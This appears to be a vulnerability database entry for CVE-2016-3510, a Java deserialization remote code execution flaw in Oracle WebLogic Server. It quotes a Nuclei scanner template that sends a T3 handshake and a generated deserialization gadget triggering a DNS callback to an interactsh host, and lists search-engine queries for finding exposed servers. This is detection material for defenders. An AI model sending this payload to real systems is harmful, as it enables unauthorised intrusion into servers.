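Vulnerability information
Vulnerability name: Oracle WebLogic Server Java Object Deserialization Remote Code Execution
Vulnerability ID:
Vulnerability type: Deserialization
Severity: Critical
Description: Oracle WebLogic Server is an enterprise application server developed by Oracle, widely used to deploy and run large distributed Java applications. It supports the Java EE standard and provides a rich feature set, including transaction management, security, clustering and high availability. Because it is so widely deployed, WebLogic Server is a significant target for attackers.
The vulnerability resides in the WLS Core Components of Oracle WebLogic Server and is a deserialization flaw. An attacker can craft a malicious serialized object and use WebLogic Server's T3 protocol to achieve remote code execution. The root cause is that WebLogic Server does not properly validate input data when deserializing it, which allows an attacker to execute arbitrary code.
The impact is severe: the flaw can be exploited remotely without authentication, giving full control of the affected server. An attacker can use it to steal sensitive data, plant malware, or launch further network attacks. Because WebLogic Server is usually deployed at the core of an enterprise's internal network, a compromise can threaten the security of the whole enterprise network. In addition, exploit code for this vulnerability is publicly available on the internet, which raises the risk of large-scale exploitation.
Vendor: Oracle
Product: WebLogic Server
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.0
Search syntax: product:"oracle weblogic", http.title:"oracle peoplesoft sign-in"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2016%2FCVE-2016-3510.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details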
```yaml
id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp

variables:
  start: "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"
  end: "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"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:7001"

    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```